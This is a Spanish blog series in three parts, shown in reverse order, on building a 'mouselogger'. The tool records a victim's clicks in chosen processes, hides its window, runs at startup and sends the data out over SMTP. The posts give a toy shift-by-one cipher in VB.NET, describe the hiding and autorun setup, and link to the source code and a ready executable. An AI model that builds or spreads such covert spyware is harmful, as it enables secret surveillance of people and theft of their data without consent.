Programando a un Mouselogger (III)

code[

Este será el ultimo post de la trilogía  del Mouselogger. En el artículo anterior implementamos el código del *.exe que hará todo el trabajo, ahora es el turno de implementar de decrypted y el form que nos mostrara los puntos en el que se hizo click.



Este es el código es del encrypted.

[sourcecode language="vb"]
Public Sub encrypted ()
Dim cadena, i As String
Dim inicio As Integer
cadena = Convert.ToString(TextBox.Text)
For inicio = 1 To Len(cadena)
i = i + Chr(Asc(Mid(cadena, inicio, 1)) + 1)
'Mid lo que hace es reemplazar por el siguiente caracter
TextBox.Text = i
Next
End Sub
[/sourcecode]

Se convierte en String el texbox y se aloja en la variabale cadena. En este caso se uso el contador de variable

Len(que nos arroja el numero de caracteres que tiene la cadena de texto incluido los espacios).

Seguido del Forn que haremos un conjunto de repeticiones del el c que este caso inicio tomo valor de 1 hasta el numero de caracteres que tiene el TextBox.

Mid es el que arrojara la cantidad de caracteres que nosotros especificaremosDim palabra As String = “Root Security”

[sourcecode language="vb"]
Dim recorte As String = Mid(palabra,1,4)
'Siendo el resultado de esta linea de codigo la palabra “ROOT”.
[/sourcecode]

Mid(cadena, inicio,1) recorrerá toda la cadena del TextBox y empezará desde 1,1 esto nos dará referencia que en la primera repetición solo tomara al primer carácter.

Asc  (http://www.elcodigoascii.com.ar/) es la función que nos devuelve el código del carácter, por ejemplo la letra R es el código ASCI 82 lo que hace después de obtener la letra por medio del Mid la convierte con código ASCI y seguido le aumenta 1 en otras palabras si se obtuvo R que era = a 82 aumentara 1 y se volverá 83.

Chr es la función que  devuelve el código en carácter en el caso anterior que escogimos R y nos arrojo 82, esta función obtendrá “R” desde 82.Dim palabra As String = Chr(82) ‘ la cual nos devolverá la letra R.Pero en el encriptado al momento de aumentarle 1 al ASC se convierte en 83 y cuando se utiliza la función Chr(83) nos mostrara el carácter “S”.

Y así continuamente para cada carácter.

En cambio el código de decrypted:

[sourcecode language="vb"]
Public Sub decrypted ()
Dim cadena, i As String
Dim inicio As Integer
cadena = Convert.ToString(TextBox.Text)
For inicio = 1 To Len(cadena)
i = i + Chr(Asc(Mid(cadena, inicio, 1)) - 1)
'En este caso se quitara -1 carácter
TextBox.Text = i
Next
End Sub
[/sourcecode]

Se usa las mismas funciones que el anterior con el cambio de que ahora no se aumentara si no se le disminuirá -1.

Ahora nos vamos al Form que nos mostrara los puntos en el cuales se hizo click como ya sabemos que proceso se hizo click solo debemos colocar la ventana de dicho proceso de tras del from transparente.

En el Form semitransparente en el cual se dibujara en las coordenadas que uno ingresa desde el textbox, la coordenada (0,0) es la de la esquina superior izquierda llegando a la coordenada que en mi laptop es la de (1366,768) esquina inferior derecha.

Descargar código fuente: https://www.dropbox.com/s/oqgm8epr58y9gsg

Descargar ejecutable: https://www.dropbox.com/s/khxxhvlkavsdspg

Programando a un Mouselogger (I)
Programando a un Mouselogger (II)
Programando a un Mouselogger (III)

Programando a un Mouselogger (II)

La segunda parte del post es la implementación del código. Mouselogger captura cada click en ciertos procesos abiertos, capaces de enviar información de la víctima mediante SMTP, teniendo acceso a las coordenadas que luego serán desemcriptados y mostrados en un form.

Ver: Programando a un Mouselogger(I)

En este caso fue ensamblado con el Net Framework 3.5, así que el proyecto debe estar usando dicha versión por lo que al momento de crear el Form debe colocar Net Framework 3.5.

 

En el Form se encuentra lo siguiente:

• (1) ListView


• (4) Label


• (3) TextBox


• (1) RichTextBox


• (6) Timer

En el Solution Explorer se encuentra lo siguiente:

 

 Solution Explorer

En cual se encontrara 11 Module y 1 Form. En cada línea de código se encuentra un comentario para así facilitar la comprensión del proceso.  Al momento de cambiar las propiedades del Form uno debe darse cuenta de que propiedades ha cambiado en especial ShowinTaskBar, Opacity además encontrara un Timer_Hide el cual hará de que el form pase oculto sin olvidarse del Autorun.

Lo única desventaja es que consume un 8% del procesador en mi caso Intel Core I3, se ha solucionado algunos fallos, pero si es que se encuentra alguno por favor deje su comentario y en breve se solucionara.

Descarga del Proyecto: www.dropbox.com/sh/47fp8uqyu3uu0zx/

Programando a un Mouselogger (I)
Programando a un Mouselogger (II)
Programando a un Mouselogger (III)

Programando a un Mouselogger (I)

Este en mi primer artículo, y debo agradecer a un buen amigo que conocí hace ya buen tiempo, me ofreció un espacio en su blog, y aqui me encuentro, el lunes charlando con unos amigos comenzó la plática de los malware... de los rasomware, los rogueware incluso los botnet del tipo de encriptación que tenia cada uno, y de ahí nació la idea del mouselogger..

Al día siguiente di riendas sueltas a mi imaginación, primero fue plantearme el algoritmo, bueno una vez hecho ello en la mente, empecé por interpretar cada proceso y leerlo adecuadamente por ejemplo:

PASO 1:



Ya que el programa está en .Net usaremos Win, lo primero era capturar el proceso del Tasklist primero leer nombre del *.exe que está corriendo y luego capturar la descripción si todo era correcto pasaba al paso 2, si no hacia un bucle.

PASO 2:



La aplicación empezara a correr y se capturara en un *.txt debidamente encriptado con cada click hecho.

PASO 3:

Luego del envió en el que solo se verá coordenadas en las que se hizo el click cada, una vez ello debemos desencriptarlo .

PASO 4:

Luego las coordenadas las llevaremos a una aplicación la cual las interpretara el tamaño de la pantalla y luego dibujara las coordenadas en una Form semi transparente.

PASO 5:



Detrás del From estará delante la pagina web en la que se capturo el cursor y cada punto será un click .

En Pseudocodigo sería lo siguiente:



Él lo siguientes artículo se publicará el código. Se puede colocar diferentes módulos para hacer nuestro “Mouselogger” mucho más robusto tratando de resolver algunos errores.

Programando a un Mouselogger (I)
Programando a un Mouselogger (II)
Programando a un Mouselogger (III)